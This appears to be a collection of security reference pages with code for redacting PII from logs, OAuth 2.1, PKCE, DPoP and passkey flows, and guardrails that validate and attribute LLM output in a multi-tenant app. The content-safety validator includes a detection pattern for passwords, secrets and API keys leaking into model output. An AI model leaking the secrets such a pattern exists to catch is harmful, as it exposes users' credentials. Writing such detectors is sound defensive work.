"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
"credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
"ip": re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
}
def redact_pii(logger, method_name: str, event_dict: dict) -> dict:
"""
Structlog processor to redact PII from all log fields.
"""
def redact_value(value: Any) -> Any:
if isinstance(value, str):
result = value
for entity_type, pattern in PII_PATTERNS.items():
result = pattern.sub(f'[REDACTED_{entity_type.upper()}]', result)
return result
elif isinstance(value, dict):
return {k: redact_value(v) for k, v in value.items()}
elif isinstance(value, list):
return [redact_value(item) for item in value]
return value
return {k: redact_value(v) for k, v in event_dict.items()}
# Configure structlog with PII redaction
structlog.configure(
processors=[
structlog.contextvars.merge_contextvars,
structlog.processors.add_log_level,
structlog.processors.TimeStamper(fmt="iso"),
redact_pii, # Add PII redaction processor
structlog.processors.JSONRenderer()
]
)
logger = structlog.get_logger()
# Usage - PII is automatically redacted
logger.info(
"user_registered",
email="john@example.com", # -> [REDACTED_EMAIL]
phone="555-123-4567" # -> [REDACTED_PHONE]
)Structlog with Presidio
import structlog
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
# Singleton Presidio engines
_analyzer = None
_anonymizer = None
def get_presidio_engines():
global _analyzer, _anonymizer
if _analyzer is None:
_analyzer = AnalyzerEngine()
_anonymizer = AnonymizerEngine()
return _analyzer, _anonymizer
def presidio_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
"""Use Presidio for enterprise-grade PII redaction in logs."""
analyzer, anonymizer = get_presidio_engines()
def redact_value(value):
if isinstance(value, str) and len(value) > 5:
try:
results = analyzer.analyze(text=value, language="en")
if results:
anonymized = anonymizer.anonymize(
text=value,
analyzer_results=results
)
return anonymized.text
except Exception:
pass # Fallback to original on error
elif isinstance(value, dict):
return {k: redact_value(v) for k, v in value.items()}
elif isinstance(value, list):
return [redact_value(item) for item in value]
return value
return {k: redact_value(v) for k, v in event_dict.items()}
structlog.configure(
processors=[
structlog.processors.add_log_level,
structlog.processors.TimeStamper(fmt="iso"),
presidio_redact_processor,
structlog.processors.JSONRenderer()
]
)Loguru Filter
import re
from loguru import logger
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
"credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
}
def pii_filter(record):
"""Loguru filter to redact PII from log messages."""
message = record["message"]
for entity_type, pattern in PII_PATTERNS.items():
message = pattern.sub(f'[REDACTED_{entity_type.upper()}]', message)
record["message"] = message
return True
# Configure loguru with PII filter
logger.remove() # Remove default handler
logger.add(
"logs/app.log",
filter=pii_filter,
format="{time:YYYY-MM-DD HH:mm:ss} | {level} | {message}",
serialize=True # JSON format
)
# Usage
logger.info("User john@example.com logged in from 192.168.1.1")
# Output: "User [REDACTED_EMAIL] logged in from [REDACTED_IP]"Loguru with Custom Patcher
from loguru import logger
def pii_patcher(record):
"""Patch record to redact PII in extra fields."""
if "extra" in record:
for key, value in record["extra"].items():
if isinstance(value, str):
for entity_type, pattern in PII_PATTERNS.items():
value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
record["extra"][key] = value
return record
logger = logger.patch(pii_patcher)
# Usage with bound variables
logger.bind(user_email="jane@example.com").info("Processing user request")
# The email in extra will be redactedField-Specific Redaction
import structlog
from typing import Any
# Fields that should always be redacted
SENSITIVE_FIELDS = {
"email", "phone", "ssn", "credit_card", "password",
"api_key", "token", "secret", "authorization"
}
# Fields that should be partially masked
PARTIAL_MASK_FIELDS = {
"user_id": lambda v: f"{str(v)[:4]}...{str(v)[-4:]}" if len(str(v)) > 8 else "***"
}
def smart_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
"""Smart redaction based on field names."""
result = {}
for key, value in event_dict.items():
key_lower = key.lower()
# Full redaction for sensitive fields
if key_lower in SENSITIVE_FIELDS:
result[key] = "[REDACTED]"
# Partial masking
elif key_lower in PARTIAL_MASK_FIELDS:
result[key] = PARTIAL_MASK_FIELDS[key_lower](value)
# Pattern-based redaction for other string fields
elif isinstance(value, str):
result[key] = redact_pii_patterns(value)
else:
result[key] = value
return result
def redact_pii_patterns(value: str) -> str:
"""Apply PII patterns to a string."""
for entity_type, pattern in PII_PATTERNS.items():
value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
return valueContext Manager for Sensitive Operations
import structlog
from contextlib import contextmanager
@contextmanager
def sensitive_logging_context():
"""
Context manager that increases redaction sensitivity.
"""
# Bind a flag to indicate we're in a sensitive context
token = structlog.contextvars.bind_contextvars(
_sensitive_context=True
)
try:
yield
finally:
structlog.contextvars.unbind_contextvars("_sensitive_context")
def enhanced_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
"""Enhanced redaction in sensitive contexts."""
is_sensitive = event_dict.pop("_sensitive_context", False)
if is_sensitive:
# In sensitive context, redact everything that looks like data
for key, value in event_dict.items():
if isinstance(value, str) and len(value) > 3:
event_dict[key] = "[REDACTED_SENSITIVE]"
else:
# Normal PII redaction
event_dict = redact_pii(logger, method_name, event_dict)
return event_dict
# Usage
logger = structlog.get_logger()
with sensitive_logging_context():
logger.info("processing_payment", card="4111111111111111")
# Everything is redacted in this contextTesting Log Redaction
import pytest
import structlog
from io import StringIO
def test_pii_redaction_in_logs():
"""Verify PII is redacted from logs."""
output = StringIO()
structlog.configure(
processors=[
redact_pii,
structlog.processors.JSONRenderer()
],
logger_factory=structlog.WriteLoggerFactory(file=output)
)
logger = structlog.get_logger()
logger.info("test", email="test@example.com", ssn="123-45-6789")
log_output = output.getvalue()
assert "test@example.com" not in log_output
assert "123-45-6789" not in log_output
assert "[REDACTED_EMAIL]" in log_output
assert "[REDACTED_SSN]" in log_outputReferences
Oauth 2.1 Passkeys
OAuth 2.1 & Passkeys Reference
OAuth 2.1 Overview
OAuth 2.1 consolidates OAuth 2.0 best practices and security requirements:
Key Changes from OAuth 2.0
- PKCE required for ALL clients (not just public)
- Implicit grant removed (security vulnerability)
- Password grant removed (credential anti-pattern)
- Bearer tokens must use TLS
- Refresh token rotation mandatory
PKCE Flow (Required)
import hashlib
import base64
import secrets
def generate_pkce_pair():
"""Generate code_verifier and code_challenge for PKCE."""
# Generate random code_verifier (43-128 chars)
code_verifier = secrets.token_urlsafe(64)
# Create code_challenge using S256
digest = hashlib.sha256(code_verifier.encode()).digest()
code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
return code_verifier, code_challenge
# Usage
verifier, challenge = generate_pkce_pair()
# Step 1: Authorization request
auth_url = f"""https://auth.example.com/authorize?
response_type=code
&client_id={client_id}
&redirect_uri={redirect_uri}
&code_challenge={challenge}
&code_challenge_method=S256
&state={state}
&scope=openid profile"""
# Step 2: Exchange code for tokens
token_response = requests.post(
"https://auth.example.com/token",
data={
"grant_type": "authorization_code",
"code": auth_code,
"redirect_uri": redirect_uri,
"client_id": client_id,
"code_verifier": verifier, # PKCE verification
}
)Token Lifetimes (2026 Recommendations)
| Token Type | Lifetime | Storage |
|---|---|---|
| Access Token | 15 min - 1 hour | Memory only |
| Refresh Token | 7-30 days | HTTPOnly cookie / secure storage |
| ID Token | Same as access | Memory only |
DPoP (Demonstrating Proof of Possession)
Binds tokens to client cryptographic keys:
import jwt
import time
import uuid
def create_dpop_proof(http_method: str, http_uri: str, private_key) -> str:
"""Create DPoP proof for request."""
claims = {
"jti": str(uuid.uuid4()),
"htm": http_method,
"htu": http_uri,
"iat": int(time.time()),
}
headers = {
"typ": "dpop+jwt",
"alg": "ES256",
"jwk": private_key.public_key().export_key(),
}
return jwt.encode(claims, private_key, algorithm="ES256", headers=headers)
# Usage
dpop_proof = create_dpop_proof("POST", "https://api.example.com/token", private_key)
response = requests.post(
"https://api.example.com/token",
headers={"DPoP": dpop_proof},
data={"grant_type": "refresh_token", "refresh_token": rt},
)Passkeys / WebAuthn
Overview
Passkeys replace passwords with cryptographic credentials:
- Phishing-resistant: Bound to origin
- Passwordless: No secrets to remember
- Multi-device: Synced via platform
- Biometric: Face ID, Touch ID, fingerprint
Registration Flow
from webauthn import (
generate_registration_options,
verify_registration_response,
)
from webauthn.helpers.structs import (
AuthenticatorSelectionCriteria,
ResidentKeyRequirement,
UserVerificationRequirement,
)
# Step 1: Generate registration options
options = generate_registration_options(
rp_id="example.com",
rp_name="Example App",
user_id=user.id.encode(),
user_name=user.email,
user_display_name=user.name,
authenticator_selection=AuthenticatorSelectionCriteria(
resident_key=ResidentKeyRequirement.REQUIRED,
user_verification=UserVerificationRequirement.REQUIRED,
),
)
# Send options to client
return jsonify(options)
# Step 2: Verify registration response
verification = verify_registration_response(
credential=client_response,
expected_challenge=stored_challenge,
expected_rp_id="example.com",
expected_origin="https://example.com",
)
# Store credential
db.save_credential(
user_id=user.id,
credential_id=verification.credential_id,
public_key=verification.credential_public_key,
sign_count=verification.sign_count,
)Authentication Flow
from webauthn import (
generate_authentication_options,
verify_authentication_response,
)
# Step 1: Generate authentication options
options = generate_authentication_options(
rp_id="example.com",
allow_credentials=[
{"id": cred.credential_id, "type": "public-key"}
for cred in user.credentials
],
)
# Step 2: Verify authentication response
verification = verify_authentication_response(
credential=client_response,
expected_challenge=stored_challenge,
expected_rp_id="example.com",
expected_origin="https://example.com",
credential_public_key=stored_credential.public_key,
credential_current_sign_count=stored_credential.sign_count,
)
# Update sign count (replay protection)
stored_credential.sign_count = verification.new_sign_count
db.save(stored_credential)
# Issue session/tokens
return create_session(user)Frontend Implementation
// Registration
async function registerPasskey(options: PublicKeyCredentialCreationOptions) {
const credential = await navigator.credentials.create({
publicKey: options,
});
// Send credential to server
await fetch('/api/auth/passkey/register', {
method: 'POST',
body: JSON.stringify(credential),
});
}
// Authentication
async function authenticateWithPasskey(options: PublicKeyCredentialRequestOptions) {
const credential = await navigator.credentials.get({
publicKey: options,
});
// Send credential to server
const response = await fetch('/api/auth/passkey/authenticate', {
method: 'POST',
body: JSON.stringify(credential),
});
return response.json();
}
// Conditional UI (autofill)
if (window.PublicKeyCredential?.isConditionalMediationAvailable) {
const available = await PublicKeyCredential.isConditionalMediationAvailable();
if (available) {
// Show passkey autofill in username field
const credential = await navigator.credentials.get({
publicKey: options,
mediation: 'conditional',
});
}
}Refresh Token Rotation
import secrets
import hashlib
from datetime import datetime, timedelta, timezone
def rotate_refresh_token(old_token: str, db) -> tuple[str, str]:
"""Rotate refresh token on use (security best practice)."""
old_hash = hashlib.sha256(old_token.encode()).hexdigest()
# Find and validate old token
token_record = db.query("""
SELECT user_id, version FROM refresh_tokens
WHERE token_hash = ? AND expires_at > NOW() AND revoked = FALSE
""", [old_hash]).fetchone()
if not token_record:
raise InvalidTokenError("Refresh token invalid or expired")
user_id, version = token_record
# Revoke old token
db.execute(
"UPDATE refresh_tokens SET revoked = TRUE WHERE token_hash = ?",
[old_hash]
)
# Create new tokens
new_access_token = create_access_token(user_id)
new_refresh_token = secrets.token_urlsafe(32)
new_hash = hashlib.sha256(new_refresh_token.encode()).hexdigest()
db.execute("""
INSERT INTO refresh_tokens (user_id, token_hash, expires_at, version)
VALUES (?, ?, ?, ?)
""", [user_id, new_hash, datetime.now(timezone.utc) + timedelta(days=7), version + 1])
return new_access_token, new_refresh_tokenExternal Links
Output Guardrails
Output Guardrails
Purpose
After LLM returns, validate the output before using it:
┌────────────────────────────────────────────────────────────┐
│ OUTPUT VALIDATION │
├────────────────────────────────────────────────────────────┤
│ │
│ LLM Response ──► Guardrails ──► Validated Output │
│ │ │
│ ▼ │
│ ┌────────────────┐ │
│ │ VALIDATORS │ │
│ ├────────────────┤ │
│ │ □ Schema │ Does it match expected? │
│ │ □ No IDs │ No hallucinated UUIDs? │
│ │ □ Grounded │ Supported by context? │
│ │ □ Safe │ No toxic content? │
│ │ □ Size │ Within limits? │
│ └────────────────┘ │
│ │ │
│ ┌──────────┴──────────┐ │
│ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ │
│ │ PASS │ │ FAIL │ │
│ │ │ │ │ │
│ │ Continue │ │ Retry or │ │
│ │ │ │ Error │ │
│ └──────────┘ └──────────┘ │
│ │
└────────────────────────────────────────────────────────────┘Implementation
1. Validation Result Type
from dataclasses import dataclass
from enum import Enum
class ValidationStatus(Enum):
PASSED = "passed"
FAILED = "failed"
WARNING = "warning"
@dataclass
class ValidationResult:
status: ValidationStatus
reason: str | None = None
details: dict | None = None
@property
def is_valid(self) -> bool:
return self.status in (ValidationStatus.PASSED, ValidationStatus.WARNING)2. Schema Validation
from pydantic import BaseModel, ValidationError
from typing import TypeVar
T = TypeVar("T", bound=BaseModel)
def validate_schema(
llm_output: dict,
schema: type[T],
) -> tuple[T | None, ValidationResult]:
"""
Validate LLM output matches expected schema.
"""
try:
parsed = schema.model_validate(llm_output)
return parsed, ValidationResult(
status=ValidationStatus.PASSED,
)
except ValidationError as e:
return None, ValidationResult(
status=ValidationStatus.FAILED,
reason=f"Schema validation failed: {e.error_count()} errors",
details={"errors": e.errors()},
)
# Usage
class AnalysisOutput(BaseModel):
summary: str
key_concepts: list[str]
difficulty: str
parsed, result = validate_schema(llm_response, AnalysisOutput)
if not result.is_valid:
raise ValidationError(result.reason)3. No Hallucinated IDs
import re
UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
def validate_no_ids(output: str) -> ValidationResult:
"""
Ensure LLM didn't hallucinate any identifiers.
"""
# Check for UUIDs
uuids = re.findall(UUID_PATTERN, output, re.IGNORECASE)
if uuids:
return ValidationResult(
status=ValidationStatus.FAILED,
reason=f"Found {len(uuids)} hallucinated UUIDs",
details={"uuids": uuids},
)
# Check for ID-like patterns
id_patterns = [
r'user_id[:\s]+\S+',
r'doc_id[:\s]+\S+',
r'id[:\s]+[a-f0-9]{8,}',
]
for pattern in id_patterns:
matches = re.findall(pattern, output, re.IGNORECASE)
if matches:
return ValidationResult(
status=ValidationStatus.WARNING,
reason=f"Found ID-like pattern: {matches[0]}",
details={"matches": matches},
)
return ValidationResult(status=ValidationStatus.PASSED)4. Grounding Validation
def validate_grounding(
output: str,
context_texts: list[str],
threshold: float = 0.3,
) -> ValidationResult:
"""
Check if LLM output is grounded in provided context.
Uses simple keyword overlap for speed.
"""
# Extract key terms from output
output_terms = set(extract_key_terms(output))
# Extract key terms from context
context_terms = set()
for text in context_texts:
context_terms.update(extract_key_terms(text))
# Calculate overlap
if not output_terms:
return ValidationResult(
status=ValidationStatus.WARNING,
reason="No key terms in output",
)
overlap = len(output_terms & context_terms) / len(output_terms)
if overlap < threshold:
return ValidationResult(
status=ValidationStatus.WARNING,
reason=f"Low grounding score: {overlap:.2%}",
details={
"overlap": overlap,
"threshold": threshold,
"ungrounded_terms": list(output_terms - context_terms)[:10],
},
)
return ValidationResult(
status=ValidationStatus.PASSED,
details={"grounding_score": overlap},
)
def extract_key_terms(text: str) -> list[str]:
"""Extract meaningful terms from text"""
import re
# Simple: words 4+ chars, lowercased
words = re.findall(r'\b[a-zA-Z]{4,}\b', text.lower())
# Filter common words
stopwords = {'this', 'that', 'with', 'from', 'have', 'been', 'will', 'would'}
return [w for w in words if w not in stopwords]5. Content Safety
async def validate_content_safety(
output: str,
) -> ValidationResult:
"""
Check for toxic/harmful content.
Uses simple pattern matching + optional LLM check.
"""
# Quick pattern check
toxic_patterns = [
r'\b(hate|violence|harm|kill)\b',
r'\b(password|secret|api.?key)\b',
]
for pattern in toxic_patterns:
if re.search(pattern, output, re.IGNORECASE):
return ValidationResult(
status=ValidationStatus.FAILED,
reason=f"Potentially unsafe content detected",
)
# PII detection
pii_patterns = {
"email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
"phone": r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b',
"ssn": r'\b\d{3}-\d{2}-\d{4}\b',
}
detected_pii = []
for pii_type, pattern in pii_patterns.items():
if re.search(pattern, output):
detected_pii.append(pii_type)
if detected_pii:
return ValidationResult(
status=ValidationStatus.WARNING,
reason=f"Potential PII detected: {detected_pii}",
details={"pii_types": detected_pii},
)
return ValidationResult(status=ValidationStatus.PASSED)6. Size Limits
def validate_size(
output: str,
max_chars: int = 50000,
max_tokens: int = 10000,
) -> ValidationResult:
"""
Ensure output is within size limits.
"""
if len(output) > max_chars:
return ValidationResult(
status=ValidationStatus.FAILED,
reason=f"Output exceeds {max_chars} chars: {len(output)}",
)
# Rough token estimate
estimated_tokens = len(output) // 4
if estimated_tokens > max_tokens:
return ValidationResult(
status=ValidationStatus.WARNING,
reason=f"Output may exceed token limit: ~{estimated_tokens}",
)
return ValidationResult(status=ValidationStatus.PASSED)7. Combined Validator
from dataclasses import dataclass
@dataclass
class GuardrailsConfig:
validate_schema: bool = True
validate_no_ids: bool = True
validate_grounding: bool = True
validate_safety: bool = True
validate_size: bool = True
grounding_threshold: float = 0.3
max_output_chars: int = 50000
async def run_guardrails(
llm_output: dict,
context_texts: list[str],
schema: type[BaseModel],
config: GuardrailsConfig = GuardrailsConfig(),
) -> tuple[BaseModel | None, list[ValidationResult]]:
"""
Run all guardrails on LLM output.
Returns parsed output and all validation results.
"""
results = []
parsed = None
# 1. Schema validation
if config.validate_schema:
parsed, result = validate_schema(llm_output, schema)
results.append(result)
if not result.is_valid:
return None, results # Stop early
output_str = str(llm_output)
# 2. No hallucinated IDs
if config.validate_no_ids:
result = validate_no_ids(output_str)
results.append(result)
# 3. Grounding check
if config.validate_grounding:
result = validate_grounding(
output_str,
context_texts,
config.grounding_threshold,
)
results.append(result)
# 4. Content safety
if config.validate_safety:
result = await validate_content_safety(output_str)
results.append(result)
# 5. Size limits
if config.validate_size:
result = validate_size(output_str, config.max_output_chars)
results.append(result)
# Check for failures
failures = [r for r in results if r.status == ValidationStatus.FAILED]
if failures:
return None, results
return parsed, resultsOrchestKit Integration
# backend/app/workflows/agents/content_analyzer.py
async def analyze_with_guardrails(state: AnalysisState) -> AnalysisState:
"""Run LLM with output guardrails"""
# Call LLM
llm_response = await llm.generate(state.prompt)
# Run guardrails
parsed, validations = await run_guardrails(
llm_output=llm_response,
context_texts=state.context_texts,
schema=AnalysisOutput,
)
# Log validations
for v in validations:
if v.status != ValidationStatus.PASSED:
logger.warning(
"guardrail_issue",
status=v.status.value,
reason=v.reason,
trace_id=state.request_context.trace_id,
)
if parsed is None:
raise GuardrailError(
"LLM output failed validation",
validations=[v for v in validations if not v.is_valid],
)
return state.with_output(parsed)Common Mistakes
# ❌ BAD: No validation
artifact.content = llm_response["content"] # Could be anything!
# ❌ BAD: Only schema validation
parsed = AnalysisOutput.parse_obj(response) # Ignores content issues
# ❌ BAD: Trusting LLM completely
if llm_response.get("is_safe", True): # LLM said it's safe!
use_response(llm_response)
# ✅ GOOD: Full guardrail pipeline
parsed, results = await run_guardrails(
llm_output=response,
context_texts=context,
schema=AnalysisOutput,
)Testing Guardrails
class TestGuardrails:
def test_detects_hallucinated_uuid(self):
output = "Analysis for doc 123e4567-e89b-12d3-a456-426614174000"
result = validate_no_ids(output)
assert result.status == ValidationStatus.FAILED
def test_detects_low_grounding(self):
output = "This is about quantum physics and black holes"
context = ["Python programming tutorial"]
result = validate_grounding(output, context)
assert result.status == ValidationStatus.WARNING
async def test_detects_pii(self):
output = "Contact john@example.com for details"
result = await validate_content_safety(output)
assert result.status == ValidationStatus.WARNING
assert "email" in result.details["pii_types"]
async def test_full_pipeline_passes(self):
valid_output = {
"summary": "Introduction to machine learning",
"key_concepts": ["ML", "training", "models"],
"difficulty": "intermediate",
}
context = ["Machine learning is a subset of AI..."]
parsed, results = await run_guardrails(
llm_output=valid_output,
context_texts=context,
schema=AnalysisOutput,
)
assert parsed is not None
assert all(r.is_valid for r in results)Post Llm Attribution
Post-LLM Attribution
The Principle
Attribution is DETERMINISTIC, not LLM-generated.
The LLM produces content. We attach context from our records.
┌────────────────────────────────────────────────────────────┐
│ POST-LLM PHASE │
├────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────┐ │
│ │ LLM │ │
│ │ │ │
│ │ Output: content │ │
│ │ (text, analysis) │ │
│ └──────────┬──────────┘ │
│ │ │
│ ▼ │
│ ┌────────────────────────┐ │
│ │ ATTRIBUTION LAYER │ │
│ │ │ │
│ From Pre-LLM: From Context: │
│ ├─ source_refs ─────────────────────► source_ids │
│ └─ chunk_ids │ │
│ │ │
│ From RequestContext: │ │
│ ├─ user_id ─────────────────────────► user_id │
│ ├─ tenant_id ───────────────────────► tenant_id │
│ ├─ trace_id ────────────────────────► trace_id │
│ └─ analysis_id ─────────────────────► analysis_id │
│ │ │
│ Generated: │ │
│ ├─ new UUID ────────────────────────► artifact_id │
│ └─ timestamp ───────────────────────► created_at │
│ │ │ │
│ └────────────┬───────────┘ │
│ │ │
│ ▼ │
│ ┌────────────────────────┐ │
│ │ COMPLETE RESULT │ │
│ │ │ │
│ │ content + attribution │ │
│ │ (ready for storage) │ │
│ └────────────────────────┘ │
│ │
└────────────────────────────────────────────────────────────┘Implementation
1. Attribution Data Structure
from dataclasses import dataclass
from datetime import datetime
from uuid import UUID, uuid4
@dataclass
class AttributedResult:
"""LLM output with deterministic attribution"""
# Generated identifier
id: UUID
# From RequestContext (system-provided)
user_id: UUID
tenant_id: UUID
analysis_id: UUID
trace_id: str
# From Pre-LLM refs (deterministic)
source_document_ids: list[UUID]
source_chunk_ids: list[UUID]
# From LLM (content only)
content: str
key_concepts: list[str]
difficulty_level: str
summary: str
# Metadata
created_at: datetime
model_used: str
processing_time_ms: float2. Attribution Function
async def attribute_llm_output(
llm_output: dict,
ctx: RequestContext,
source_refs: SourceReference,
model_name: str,
processing_time_ms: float,
) -> AttributedResult:
"""
Attach context to LLM output.
All attribution comes from our records, not the LLM.
"""
# Validate LLM output has no IDs
if contains_identifiers(llm_output):
raise SecurityError("LLM output contains identifiers")
return AttributedResult(
# New ID for this artifact
id=uuid4(),
# From RequestContext (verified from JWT)
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
analysis_id=ctx.resource_id,
trace_id=ctx.trace_id,
# From Pre-LLM capture (deterministic)
source_document_ids=source_refs.document_ids,
source_chunk_ids=source_refs.chunk_ids,
# From LLM (content only)
content=llm_output["analysis"],
key_concepts=llm_output.get("key_concepts", []),
difficulty_level=llm_output.get("difficulty", "intermediate"),
summary=llm_output.get("summary", ""),
# Metadata
created_at=datetime.now(timezone.utc),
model_used=model_name,
processing_time_ms=processing_time_ms,
)
def contains_identifiers(output: dict) -> bool:
"""Check if LLM output contains any identifiers"""
import re
output_str = str(output)
# Check for UUIDs
if re.search(UUID_PATTERN, output_str):
return True
# Check for ID field names in content
for field in ["user_id", "tenant_id", "document_id"]:
if field in output_str.lower():
return True
return False3. Storage with Attribution
async def save_attributed_result(
result: AttributedResult,
db: AsyncSession,
) -> None:
"""
Save result with all attribution intact.
Attribution comes from our context, not LLM.
"""
# Create artifact record
artifact = Artifact(
id=result.id,
user_id=result.user_id,
tenant_id=result.tenant_id,
analysis_id=result.analysis_id,
content=result.content,
key_concepts=result.key_concepts,
difficulty_level=result.difficulty_level,
summary=result.summary,
created_at=result.created_at,
model_used=result.model_used,
)
db.add(artifact)
# Create source links
for doc_id in result.source_document_ids:
link = ArtifactSourceLink(
artifact_id=result.id,
document_id=doc_id,
tenant_id=result.tenant_id, # Denormalized for RLS
)
db.add(link)
await db.commit()
# Audit log
logger.audit(
"artifact.created",
artifact_id=result.id,
user_id=result.user_id,
tenant_id=result.tenant_id,
source_count=len(result.source_document_ids),
)OrchestKit Integration
Content Analysis Workflow
# backend/app/workflows/agents/content_analyzer.py
async def create_analysis_artifact(state: AnalysisState) -> AnalysisState:
"""Create artifact with proper attribution"""
# LLM output (content only)
llm_output = state.llm_response
# Attribute using our context
attributed = await attribute_llm_output(
llm_output=llm_output,
ctx=state.request_context, # From JWT
source_refs=state.source_refs, # From pre-LLM
model_name=state.model_used,
processing_time_ms=state.llm_time_ms,
)
# Save with attribution
await save_attributed_result(attributed, state.db)
return state.with_artifact(attributed)Artifact Retrieval
# backend/app/api/artifacts.py
@router.get("/{artifact_id}")
async def get_artifact(
artifact_id: UUID,
ctx: RequestContext = Depends(get_request_context),
db: AsyncSession = Depends(get_db),
):
"""Get artifact with source attribution"""
# Query with tenant filter
artifact = await db.execute(
"""
SELECT a.*, array_agg(asl.document_id) as sources
FROM artifacts a
LEFT JOIN artifact_source_links asl ON a.id = asl.artifact_id
WHERE a.id = :id
AND a.tenant_id = :tenant_id -- ALWAYS filter
GROUP BY a.id
""",
{
"id": artifact_id,
"tenant_id": ctx.tenant_id,
}
)
if not artifact:
raise HTTPException(404)
return ArtifactResponse(
id=artifact.id,
content=artifact.content,
sources=artifact.sources, # Deterministic from our records
created_at=artifact.created_at,
)Common Mistakes
# ❌ BAD: Asking LLM for attribution
prompt = "Analyze this and tell me which document it came from"
response = llm.generate(prompt)
doc_id = response["source_document"] # HALLUCINATED!
# ❌ BAD: Trusting LLM-provided IDs
llm_output = {"analysis": "...", "user_id": "abc123"}
artifact.user_id = llm_output["user_id"] # WRONG!
# ❌ BAD: Generating IDs in prompt
prompt = f"Generate a unique ID for this analysis: {analysis_id}"
# ✅ GOOD: Attribution from our records
artifact.user_id = ctx.user_id # From JWT
artifact.sources = source_refs.document_ids # From pre-LLM
# ✅ GOOD: Generate IDs ourselves
artifact.id = uuid4() # We generate
# ✅ GOOD: LLM provides content only
artifact.content = llm_output["analysis"] # Just the textTesting Attribution
class TestAttribution:
async def test_attribution_from_context_not_llm(self, ctx):
"""Attribution must come from our context"""
# LLM returns content only
llm_output = {
"analysis": "This is the analysis",
"key_concepts": ["ML", "AI"],
}
source_refs = SourceReference(
document_ids=[uuid4(), uuid4()],
chunk_ids=[uuid4()],
)
result = await attribute_llm_output(
llm_output=llm_output,
ctx=ctx,
source_refs=source_refs,
)
# Attribution from context, not LLM
assert result.user_id == ctx.user_id
assert result.tenant_id == ctx.tenant_id
assert result.source_document_ids == source_refs.document_ids
async def test_rejects_llm_with_ids(self, ctx):
"""Reject LLM output that contains IDs"""
bad_output = {
"analysis": "Result for user 123e4567-e89b-12d3-a456-426614174000",
}
with pytest.raises(SecurityError):
await attribute_llm_output(bad_output, ctx, source_refs)
async def test_source_links_created(self, ctx, db):
"""Source links are created with artifact"""
result = await attribute_llm_output(...)
await save_attributed_result(result, db)
links = await db.execute(
"SELECT * FROM artifact_source_links WHERE artifact_id = :id",
{"id": result.id}
)
assert len(links) == len(result.source_document_ids)Pre Llm Filtering
Pre-LLM Filtering
Purpose
Before ANY data reaches the LLM, it must be:
- Scoped to the current tenant/user
- Filtered for relevance
- Stripped of identifiers
- Captured for later attribution
┌────────────────────────────────────────────────────────────┐
│ PRE-LLM PHASE │
├────────────────────────────────────────────────────────────┤
│ │
│ User Query ──► Tenant Filter ──► Content Extract ──► LLM │
│ │ │ │ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────┐ ┌───────────┐ ┌─────────────┐ │
│ │ Query │ │ Documents │ │ Text Only │ │
│ │ Text │ │ for THIS │ │ (no IDs) │ │
│ │ │ │ tenant │ │ │ │
│ └─────────┘ └───────────┘ └─────────────┘ │
│ │ │
│ ▼ │
│ ┌─────────────┐ │
│ │ Save Refs │ │
│ │ for Later │ ◄── For post-LLM attribution│
│ │ Attribution │ │
│ └─────────────┘ │
│ │
└────────────────────────────────────────────────────────────┘Implementation
1. Tenant-Scoped Retrieval
from uuid import UUID
from dataclasses import dataclass
@dataclass
class SourceReference:
"""Tracks what was retrieved for attribution"""
document_ids: list[UUID]
chunk_ids: list[UUID]
similarity_scores: list[float]
retrieval_timestamp: datetime
async def retrieve_with_isolation(
query: str,
ctx: RequestContext,
limit: int = 10,
) -> tuple[list[str], SourceReference]:
"""
Retrieve documents scoped to tenant/user.
Returns: (content_texts, source_references)
"""
# Embed query
query_embedding = await embed(query)
# Search with MANDATORY tenant filter
results = await db.execute(
"""
SELECT id, chunk_id, content,
1 - (embedding <-> :query) as similarity
FROM document_chunks
WHERE tenant_id = :tenant_id -- REQUIRED
AND user_id = :user_id -- REQUIRED
AND embedding <-> :query < 0.5
ORDER BY embedding <-> :query
LIMIT :limit
""",
{
"tenant_id": ctx.tenant_id, # From JWT
"user_id": ctx.user_id, # From JWT
"query": query_embedding,
"limit": limit,
}
)
# Separate content from references
content_texts = [r.content for r in results]
source_refs = SourceReference(
document_ids=[r.id for r in results],
chunk_ids=[r.chunk_id for r in results],
similarity_scores=[r.similarity for r in results],
retrieval_timestamp=datetime.now(timezone.utc),
)
return content_texts, source_refs2. Content Extraction (Strip IDs)
def extract_content_only(documents: list[Document]) -> list[str]:
"""
Extract text content, stripping any embedded IDs.
"""
contents = []
for doc in documents:
# Get content
text = doc.content
# Remove any embedded IDs (defensive)
text = strip_identifiers(text)
contents.append(text)
return contents
def strip_identifiers(text: str) -> str:
"""Remove any identifiers that might have leaked into content"""
import re
# Remove UUIDs
text = re.sub(
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
'[REDACTED]',
text,
flags=re.IGNORECASE
)
# Remove common ID patterns
patterns = [
r'user_id:\s*\S+',
r'tenant_id:\s*\S+',
r'doc_id:\s*\S+',
]
for pattern in patterns:
text = re.sub(pattern, '[REDACTED]', text, flags=re.IGNORECASE)
return text3. Full Pre-LLM Pipeline
@dataclass
class PreLLMResult:
"""Complete pre-LLM preparation result"""
query: str
context_texts: list[str]
